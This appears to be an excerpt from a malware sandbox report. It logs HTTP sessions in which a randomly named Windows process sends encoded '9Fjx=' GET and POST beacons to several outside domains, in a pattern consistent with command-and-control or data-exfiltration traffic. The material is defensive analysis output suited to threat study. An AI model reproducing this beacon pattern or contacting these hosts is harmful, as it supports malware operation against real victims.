37 79 44 45 56 47 66 75 51 39 4b 68 6c 57 36 75 2f 64 45 49 55 46 54 34 35 57 77 38 41 66 34 2f 6e 48 48 49 4c 30 6d 6b 72 75 78 4e 72 78 58 6e 33 34 41 57 67 4f 47 36 2f 37 72 63 31 61 58 77 37 71 67 4c 42 43 57 44 6c 4d 62 7a 39 61 39 69 79 71 32 33 74 34 72 52 32 4b 46 5a 6a 48 6e 4d 6d 46 75 58 44 76 57 2f 55 44 58 68 52 74 53 6e 6b 35 2f 41 44 42 36 41 47 6e 53 43 [TRUNCATED] Data Ascii: 9Fjx=smAsgQXJ1U54w0ktOehM5gnhzdQklBDBaRzUQK+SaENih71GkPNA0nY8NxbT4UTGlKP9PuiwDu10u3WMgjHZJuozwSB/0i8HdE+FaoMlGOGaO3AwBw/J5HMVZygyI5AdRpSwNQQzdtT2XOGDLFWvsoN1Z5KXzKkVkk3D8YDVOd772CZJURwkyWCAc5UNb5bH8arw8ImM3jXL1xkMe7yDEVGfuQ9KhlW6u/dEIUFT45Ww8Af4/nHHIL0mkruxNrxXn34AWgOG6/7rc1aXw7qgLBCWDlMbz9a9iyq23t4rR2KFZjHnMmFuXDvW/UDXhRtSnk5/ADB6AGnSCAfExiGi5GG1gKQ6vHnR6CsBGq1dY5nIA3PpZyVbA06ZE/YZiDiefXimbdLi/uu88OniA7fF7fyQ4cxUvbiz51ji8dLGQ76MoNAMXQioektmaJEzzjWTXuYKJE+Ylk5LhzG5b+XZwwqlcrBJRtwKXSwe2iVybs7n6/XbHhm4J3ihhcEL1IO3nQ1Ztme14TOVCSPQtQjTCZYNIm7ddJW/dWmuaT7kaUienOp9ioX2FNEjmiYWHta2xliLLN4Sz6QVbqQOvxHrD1goe5MWMljZI+Yk4sJTsT1Ffdov38up4KsIYqBWIW/cVEOyhATpClxb23QHGbG3XodHsGssU4jgnTOtyOq3xs5pBSNjlIVi38dsSfswfYfg4I/FbSFLOmQAWxVH3+tCWpATzkkugTi/9Wbdi+XEcxhYX8oQoOHFUxbNRSxDQtMv7nzVbMNYzWaoTxWO5sgsGXU4MTQY7wNcsLs6qI1dezXzvxpIXsogr//ecw0bEyRnwMSEZAmor6nIAhXCwjVCxd++fMOQ30AhboQeiW4HgQ6tTbHoZLNWPIoRVaXg/GZwQUfcHBn7EI7zm/9c2FSAfl35YCzMzEC/O8f1LdWLcF4AXk7e41sBJpDmzQe/LDSkOOSW6rgzmJb03YUhjrVSPUGln68ZMNQH0HYd0jbczCzBVO+ [TRUNCATED]
Jul 27, 2024 08:06:53.908344030 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 06:06:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1bdglnsacqllacisni491of8j3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Encoding: gzip Data Raw: 35 35 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 cb 6e dc 36 14 5d 8f bf 82 d5 a2 6e 81 99 91 9d 47 e3 26 d2 18 79 d8 40 8a 20 8b bc 80 ae 0a 8e c4 19 d1 a6 48 99 a4 66 a2 2f e8 1f b4 9b a2 bb a2 40 d1 2e ba eb 3e bf 52 04 fd 8c 9e 4b 4a f3 08 9c 20 80 07 06 86 23 dd 7b ee bd e7 be e8 83 ac f2 b5 9a 1d 64 95 e0 e5 ec 60 94 79 e9 95 98 3d 31 35 97 9a bd 6c 5d 23 b4 93 46 67 69 7c 01 89 5a 78 ce 2a ef 9b 89 b8 6a e5 2a 4f 1e 1b ed 85 f6 93 57 5d 23 12 56 c4 5f 79 e2 c5 5b 9f 12 fa 03 56 54 dc 3a e1 f3 d6 2f 26 27 09 99 51 52 5f b2 ca 8a 45 7e 48 50 ee 7e 9a 2e a0 e8 a6 4b 63 96 4a f0 46 ba 69 61 ea b4 70 ee 74 c1 6b a9 ba fc 85 99 1b 6f ee df 39 3a 1a df 3e 3a 3a 64 56 a8 fc d0 f9 4e 09 57 09 e1 0f 99 87 fd fc 30 98 85 da 21 cc 0c 86 48 34 d9 8a 26 d1 72 52 72 cf d3 f8 38 7e 4d a1 b7 75 ef 33 b4 14 bc 0c 2a 59 1a 09 cc e6 a6 ec 58 a1 b8 73 60 80 cf 95 98 ac 2d 6f 1a 61 03 ae 2b ac 6c 3c 73 b6 c8 93 21 ee f5 7a dd 47 1d 22 b6 a2 e0 8d 07 63 29 48 98 5e b8 d3 4a e5 42 27 b3 2c 8d ca b3 83 83 ac 94 ab [TRUNCATED] Data Ascii: 555Wn6]nG&y@ Hf/@.>RKJ #{d`y=15l]#Fgi\|ZxjOW]#V_y[VT:/&'QR_E~HP~.KcJFiaptko9:>::dVNW0!H4&rRr8~Mu3YXs`-oa+l<s!zG"c)H^JB',}P72,'q#r%@`4`Qv'(<^2-/H/O#<cqd}1a'r,"9+OfYyyd=[qrJK#v>tzPgwsn[zXgOD]qS_/(??Zlyq?bJqSU@}T4KXMH\;4;1S:nixykB,(jRGs+?Tp/QeZxx9djqS[ucDLdc0.YgZ\|3v4.%#MN<dWzk(XSi;cb=@1b`!apDAQ`YDxHQ;p2.x\|sSRB2d`<;F
Jul 27, 2024 08:06:53.908361912 CEST	507	IN	Data Raw: 19 dd 32 17 18 d7 86 29 83 68 2d 72 e6 8c 5a 09 d8 38 47 28 81 ff 3e 35 30 61 b0 38 c8 06 65 b9 17 64 9a 6a 4c a9 6e cc 1a 2c 4a 27 06 3f 3e 9a ba 6d aa 7a e0 21 63 03 ac 00 3a 45 b1 47 4a 24 15 3e 10 2e ba 69 81 ec 41 0e 4b 19 66 fb b0 f7 14 80 Data Ascii: 2)h-rZ8G(>50a8edjLn,J'?>mz!c:EGJ$>.iAKfZ !#V;Q[)5U!VQq0!hY/HQm~m!$Qz<;aWhfi##owWi3!]?X)]x2A8j9ecFO4,.K$20oG(`+J.)$ ,[/lp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	62400	51.89.93.192	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:06:55.855489969 CEST	485	OUT	GET /f97t/?9Fjx=hkoMjg324npAs1ZCaJ4l6gjuuMVKqirGeTvgOqr4Vk4zrcx6pPdR0EEsFRv2ynLc3LXxE/GYJ+1j0EaBoRiBDqID1A1i8E5oXVGiNZgqPpHIcw0wTETksExpRwNzA/AaAKrSJng=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.noghteyab.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:06:56.482367039 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 06:06:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hqkggufbcffr13pvc25jeldsss; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Data Raw: 31 30 34 36 0d 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 53 75 73 70 65 6e 73 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 09 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 64 61 74 61 2f 73 74 79 6c 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 64 61 74 61 2f 73 74 79 6c 65 73 2f 6c 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 [TRUNCATED] Data Ascii: 1046<html><head><title>Domain Suspension</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link href='https://fonts.googleapis.com/css?family=Roboto:400,300' rel='stylesheet' type='text/css'><link rel="stylesheet" href="data/styles/style.css"><link rel="stylesheet" href="data/styles/ls.css"></head><body class="table-wrapper"><script src="https://www.google.com/recaptcha/api.js?hl=en"></script><div class="table-cell"><div id="container" style="position:relative;"><div id="country-select"> <form action=""> <select id="country-options" name="country-options"> <option selected="selected" title="//www.noghteyab.com/f97t/?9Fjx=hkoMjg324npAs1ZCaJ4l6gjuuMVKqirGeTvgOqr4Vk4zrcx6pPdR0EEsFRv2ynLc3LXxE/GYJ+1j0EaBoRiBDqID1A1i8E5oXVGiNZgqPpHIcw0wTETksExpRwNzA/AaAKrSJng=&h20PB=Ilr0H&lang=en" value="en">English</option> <option
Jul 27, 2024 08:06:56.482461929 CEST	224	IN	Data Raw: 20 74 69 74 6c 65 3d 22 2f 2f 77 77 77 2e 6e 6f 67 68 74 65 79 61 62 2e 63 6f 6d 2f 66 39 37 74 2f 3f 39 46 6a 78 3d 68 6b 6f 4d 6a 67 33 32 34 6e 70 41 73 31 5a 43 61 4a 34 6c 36 67 6a 75 75 4d 56 4b 71 69 72 47 65 54 76 67 4f 71 72 34 56 6b 34 Data Ascii: title="//www.noghteyab.com/f97t/?9Fjx=hkoMjg324npAs1ZCaJ4l6gjuuMVKqirGeTvgOqr4Vk4zrcx6pPdR0EEsFRv2ynLc3LXxE/GYJ+1j0EaBoRiBDqID1A1i8E5oXVGiNZgqPpHIcw0wTETksExpRwNzA/AaAKrSJng=&h20PB=Ilr0H&lang=fr" value="fr">Franais</optio
Jul 27, 2024 08:06:56.482475996 CEST	1236	IN	Data Raw: 6e 3e 0a 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 20 74 69 74 6c 65 3d 22 2f 2f 77 77 77 2e 6e 6f 67 68 74 65 79 61 62 2e 63 6f 6d 2f 66 39 37 74 2f 3f 39 46 6a 78 3d 68 6b 6f 4d 6a 67 33 32 34 6e 70 41 73 31 5a 43 61 4a 34 6c 36 67 6a 75 75 4d Data Ascii: n> <option title="//www.noghteyab.com/f97t/?9Fjx=hkoMjg324npAs1ZCaJ4l6gjuuMVKqirGeTvgOqr4Vk4zrcx6pPdR0EEsFRv2ynLc3LXxE/GYJ+1j0EaBoRiBDqID1A1i8E5oXVGiNZgqPpHIcw0wTETksExpRwNzA/AaAKrSJng=&h20PB=Ilr0H&lang=de" value="de">Deutsch</option>
Jul 27, 2024 08:06:56.482510090 CEST	1236	IN	Data Raw: 65 63 74 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 2f 3e 0a 20 20 3c 2f 66 6f 72 6d 3e 0a 3c 2f 64 69 76 3e 0a 0a 0a 09 09 3c 68 31 3e 44 6f 6d 61 69 6e 20 53 75 73 70 65 6e 73 69 6f 6e 3c 2f 68 31 3e 0a 09 09 3c 68 32 3e 52 65 67 69 73 74 Data Ascii: ect" type="submit" /> </form></div><h1>Domain Suspension</h1><h2>Registrant Information Verification Failure</h2><div id="message"><p>ICANN, the Internet Corporation for Assigned Names and Numbers, requires us to ask you as a
Jul 27, 2024 08:06:56.482527971 CEST	589	IN	Data Raw: 73 70 61 6e 3e 20 28 4c 65 74 74 65 72 73 20 61 72 65 20 6e 6f 74 20 63 61 73 65 20 73 65 6e 73 69 74 69 76 65 2e 29 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 0a 09 09 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 3f 64 6f 6d 61 69 6e 3d 6e 6f Data Ascii: span> (Letters are not case sensitive.)</span></p> <form action="?domain=noghteyab.com&lang=en" method="post">...<input type="hidden" name="domain" value="noghteyab.com">--> <input type="hidden" name="sent" value="1">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	62401	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:01.605824947 CEST	759	OUT	POST /8y3s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.loangoatworld.com Origin: http://www.loangoatworld.com Referer: http://www.loangoatworld.com/8y3s/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 38 32 56 45 45 6c 39 4d 2f 4b 4f 69 6c 31 42 64 64 36 58 77 41 74 52 41 41 78 6c 4f 34 43 42 43 48 36 6e 32 6a 52 45 63 66 34 74 76 63 46 6d 2b 69 6b 68 52 54 65 43 76 35 67 57 73 77 5a 73 6e 49 31 78 33 44 36 66 59 58 46 6f 4d 4b 51 44 56 62 61 7a 6d 66 7a 78 77 6d 78 74 6a 64 63 2b 37 70 6c 78 2b 32 61 44 44 6c 6f 78 55 78 51 65 70 75 57 4d 54 70 6e 36 44 72 74 43 4e 2f 34 78 4e 70 6d 6c 64 75 49 64 64 46 4d 77 31 42 6e 72 6d 31 4e 56 73 4f 47 6b 67 36 75 44 6b 73 34 34 68 71 34 6a 56 50 64 45 63 36 78 6e 59 37 76 2b 54 51 6a 62 4e 45 6c 6d 2f 70 50 47 33 57 53 66 39 78 4b 56 6a 41 4b 76 70 33 72 46 Data Ascii: 9Fjx=r82VEEl9M/KOil1Bdd6XwAtRAAxlO4CBCH6n2jREcf4tvcFm+ikhRTeCv5gWswZsnI1x3D6fYXFoMKQDVbazmfzxwmxtjdc+7plx+2aDDloxUxQepuWMTpn6DrtCN/4xNpmlduIddFMw1Bnrm1NVsOGkg6uDks44hq4jVPdEc6xnY7v+TQjbNElm/pPG3WSf9xKVjAKvp3rF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	62402	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:04.178400993 CEST	783	OUT	POST /8y3s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.loangoatworld.com Origin: http://www.loangoatworld.com Referer: http://www.loangoatworld.com/8y3s/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 38 32 56 45 45 6c 39 4d 2f 4b 4f 67 46 46 42 66 2b 69 58 78 67 74 53 4b 67 78 6c 56 6f 43 4e 43 48 2b 6e 32 69 6b 66 63 74 63 74 76 2b 64 6d 2f 6a 6b 68 43 6a 65 43 6e 5a 67 66 6f 77 5a 6e 6e 49 78 44 33 44 57 66 59 58 42 6f 4d 4c 41 44 41 39 53 79 6e 50 7a 7a 6b 57 78 76 6e 64 63 2b 37 70 6c 78 2b 31 6d 70 44 6c 77 78 55 41 67 65 6f 50 57 50 51 70 6e 37 56 62 74 43 62 50 34 39 4e 70 6d 58 64 71 6f 6e 64 41 41 77 31 44 50 72 6d 6b 4e 53 6e 4f 47 69 2f 4b 76 4d 6c 74 35 54 6e 63 4e 43 57 4d 5a 6c 64 6f 46 33 51 74 75 6b 50 6a 6a 34 66 55 46 6b 2f 72 58 30 33 32 53 31 2f 78 79 56 78 58 47 49 6d 44 4f 6d 7a 34 62 36 53 47 44 32 65 51 70 38 79 31 33 4b 76 36 6e 62 65 51 3d 3d Data Ascii: 9Fjx=r82VEEl9M/KOgFFBf+iXxgtSKgxlVoCNCH+n2ikfctctv+dm/jkhCjeCnZgfowZnnIxD3DWfYXBoMLADA9SynPzzkWxvndc+7plx+1mpDlwxUAgeoPWPQpn7VbtCbP49NpmXdqondAAw1DPrmkNSnOGi/KvMlt5TncNCWMZldoF3QtukPjj4fUFk/rX032S1/xyVxXGImDOmz4b6SGD2eQp8y13Kv6nbeQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	62403	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:06.753112078 CEST	1796	OUT	POST /8y3s/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 1245 Cache-Control: no-cache Connection: close Host: www.loangoatworld.com Origin: http://www.loangoatworld.com Referer: http://www.loangoatworld.com/8y3s/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 72 38 32 56 45 45 6c 39 4d 2f 4b 4f 67 46 46 42 66 2b 69 58 78 67 74 53 4b 67 78 6c 56 6f 43 4e 43 48 2b 6e 32 69 6b 66 63 74 55 74 6f 4e 56 6d 2b 45 77 68 42 6a 65 43 70 35 67 53 6f 77 5a 32 6e 49 4a 48 33 44 4c 6b 59 53 64 6f 4e 70 59 44 45 2f 36 79 75 50 7a 7a 6d 57 78 75 6a 64 63 72 37 74 4a 31 2b 32 65 70 44 6c 77 78 55 44 34 65 68 2b 57 50 63 4a 6e 36 44 72 74 65 4e 2f 34 5a 4e 6f 43 74 64 71 74 46 64 7a 49 77 31 6a 66 72 6b 57 6c 53 34 2b 47 67 2b 4b 75 54 6c 6f 68 4d 6e 63 35 67 57 50 46 66 64 6f 68 33 41 63 66 72 55 79 2f 43 4b 56 74 55 76 35 4c 6d 7a 51 65 46 6d 48 69 4d 30 68 47 36 6b 41 37 4f 72 65 66 66 41 52 71 55 52 32 55 52 35 53 62 66 75 36 2b 2f 43 43 6b 79 66 6c 49 43 72 41 47 66 53 46 6a 43 6c 63 4c 6e 76 72 72 53 6e 47 62 44 7a 39 32 61 41 43 47 74 2f 4c 42 6b 55 76 73 72 39 64 53 32 47 4c 44 61 42 68 75 45 63 4e 69 79 37 34 68 6a 4d 45 58 42 6a 52 46 30 47 77 6f 76 54 44 78 38 6f 75 4b 6e 2f 4e 72 6d 48 39 43 71 54 65 61 74 76 71 57 53 2f 71 46 72 76 50 74 48 63 [TRUNCATED] Data Ascii: 9Fjx=r82VEEl9M/KOgFFBf+iXxgtSKgxlVoCNCH+n2ikfctUtoNVm+EwhBjeCp5gSowZ2nIJH3DLkYSdoNpYDE/6yuPzzmWxujdcr7tJ1+2epDlwxUD4eh+WPcJn6DrteN/4ZNoCtdqtFdzIw1jfrkWlS4+Gg+KuTlohMnc5gWPFfdoh3AcfrUy/CKVtUv5LmzQeFmHiM0hG6kA7OreffARqUR2UR5Sbfu6+/CCkyflICrAGfSFjClcLnvrrSnGbDz92aACGt/LBkUvsr9dS2GLDaBhuEcNiy74hjMEXBjRF0GwovTDx8ouKn/NrmH9CqTeatvqWS/qFrvPtHcevllQmDauNjwCxM0sIf0s2gDoA9/1hDOCkmMOh7mwNJ0rUvCzXaGTmRCEXN4KFXYwp/lWWg3XwkntZNCrgCs7ifqWZsCfFkNjfSXirJF7bB9Fj3P7ZH2TctcG9SVpSynPOmmeBNSHUqaWG6uUcUEVnygpyOoepewk/0w625f1H6Zpx3r+Ff7oiucG7O3fs2BYddlfrttihA1vDW5Suq1HxPYnunSTpfAD5c4P8Fh1+bNaBx4msLOgJh9mg/ZRysYqHeudsRG0IID4jFtPhCsu7iJZLEbLoRee4zBeTCM52tFkmpXfWRL4EbMMaSEUITQPZvckSJxDaY4rMgwiksopDTDu9XjOPF2YYSh9wTSbUJEdvRim2eJsZyYTFPg1Ie4/hETvweQSUyDTZVLlDg2Gak5GDduCHU9vTEGUjWwer+3/JR1hxKVBuuisiNp52Zjs9bOtw7X0LgIAZ5AEQVEaR0judxP2dKft+BCgYFt8KihdGACEWYooiD7m4WbxzpPBVLsi9Y6qb3a0+DNeEaq5xaP1BQVClksoBpw1iWcBYLMtPWZl55HF83fIEWp04MzTMeitheTTiNqjHIJ7bKAvnDG3yspSSZuZ1P0b0/wtI/R3fUlRFm3lYjJJg4rLr1b5MauK17+WoOHlsCvlsGerzMt4Exynked7z [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	62404	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:09.320512056 CEST	489	OUT	GET /8y3s/?9Fjx=m+e1HwtEOOeM4G5OXbOM1l1mMhEELbDuBR7SzEsfX5sQt5Y/60pxewufhKo1oWdPn8Rq+iGyekpfb4U1GvT2jbL6nhhjvrxd94xSxVO4NFUPY0kg0texG8HyL5tYcYoZK9KCXOc=&h20PB=Ilr0H HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.loangoatworld.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Jul 27, 2024 08:07:09.792646885 CEST	408	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 27 Jul 2024 06:07:09 GMT Content-Type: text/html Content-Length: 268 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 46 6a 78 3d 6d 2b 65 31 48 77 74 45 4f 4f 65 4d 34 47 35 4f 58 62 4f 4d 31 6c 31 6d 4d 68 45 45 4c 62 44 75 42 52 37 53 7a 45 73 66 58 35 73 51 74 35 59 2f 36 30 70 78 65 77 75 66 68 4b 6f 31 6f 57 64 50 6e 38 52 71 2b 69 47 79 65 6b 70 66 62 34 55 31 47 76 54 32 6a 62 4c 36 6e 68 68 6a 76 72 78 64 39 34 78 53 78 56 4f 34 4e 46 55 50 59 30 6b 67 30 74 65 78 47 38 48 79 4c 35 74 59 63 59 6f 5a 4b 39 4b 43 58 4f 63 3d 26 68 32 30 50 42 3d 49 6c 72 30 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9Fjx=m+e1HwtEOOeM4G5OXbOM1l1mMhEELbDuBR7SzEsfX5sQt5Y/60pxewufhKo1oWdPn8Rq+iGyekpfb4U1GvT2jbL6nhhjvrxd94xSxVO4NFUPY0kg0texG8HyL5tYcYoZK9KCXOc=&h20PB=Ilr0H"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	62405	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:14.891119003 CEST	756	OUT	POST /eswm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 209 Cache-Control: no-cache Connection: close Host: www.forthelement.com Origin: http://www.forthelement.com Referer: http://www.forthelement.com/eswm/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 70 6b 49 64 43 39 72 6c 4e 44 52 76 46 45 56 55 64 35 39 6c 68 4e 6a 66 72 49 53 35 4d 67 4d 36 35 41 55 79 70 6e 48 32 6f 5a 6f 45 74 55 49 76 67 61 71 42 56 49 35 6b 63 7a 43 78 78 41 50 78 56 45 49 51 37 33 63 6c 47 72 50 45 2b 39 74 57 4f 33 6f 59 68 49 45 50 2b 4c 30 4d 42 59 7a 45 44 49 31 6c 76 67 79 33 35 6f 56 2f 54 6d 73 67 32 58 4d 61 32 52 6b 61 6c 4c 37 41 4e 6b 66 62 61 73 73 69 65 77 54 5a 59 68 74 35 72 52 2f 51 36 62 51 62 6e 48 56 52 6a 4c 46 4f 6b 47 4d 68 72 73 4d 53 75 72 33 44 46 35 47 6b 33 63 75 56 50 58 33 63 4e 53 49 6a 35 51 66 35 63 6c 6c 75 36 45 65 56 45 31 4c 6d 4a 58 30 42 Data Ascii: 9Fjx=pkIdC9rlNDRvFEVUd59lhNjfrIS5MgM65AUypnH2oZoEtUIvgaqBVI5kczCxxAPxVEIQ73clGrPE+9tWO3oYhIEP+L0MBYzEDI1lvgy35oV/Tmsg2XMa2RkalL7ANkfbassiewTZYht5rR/Q6bQbnHVRjLFOkGMhrsMSur3DF5Gk3cuVPX3cNSIj5Qf5cllu6EeVE1LmJX0B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	62406	3.33.130.190	80	2036	C:\Program Files (x86)\nWGrPwDLcexWRjyXAiZXJOGIpHAbuRyhSSsaRGQtzRcqRvMUSLaXPTDTNbyHHpZuxfDVDXqgjhsd\sbJGUdSMCgtLQJ.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 08:07:17.463346004 CEST	780	OUT	POST /eswm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded Content-Length: 233 Cache-Control: no-cache Connection: close Host: www.forthelement.com Origin: http://www.forthelement.com Referer: http://www.forthelement.com/eswm/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 39 46 6a 78 3d 70 6b 49 64 43 39 72 6c 4e 44 52 76 44 6b 6c 55 66 61 56 6c 6d 74 6a 51 6e 6f 53 35 43 77 4d 32 35 42 6f 79 70 69 2f 59 6f 72 38 45 73 30 59 76 6e 62 71 42 57 49 35 6b 54 54 43 77 31 41 50 2b 56 45 4d 59 37 7a 59 6c 47 6f 7a 45 2b 38 64 57 4f 45 77 62 6e 59 45 4e 72 37 30 4f 4d 34 7a 45 44 49 31 6c 76 67 33 2f 35 6f 4e 2f 55 57 63 67 33 32 4d 64 31 52 6b 5a 6d 4c 37 41 4a 6b 66 48 61 73 73 51 65 78 2b 43 59 6a 56 35 72 56 37 51 2b 59 49 63 70 48 56 58 74 72 46 52 6e 30 78 66 69 64 63 65 78 74 72 77 62 65 65 51 2f 4b 76 50 54 6b 33 2f 66 43 6f 68 35 53 48 4c 63 46 6c 45 34 45 6d 56 57 69 48 42 47 6a 52 69 58 53 52 36 46 67 61 35 4d 31 68 2b 30 74 39 64 4b 64 33 46 70 77 3d 3d Data Ascii: 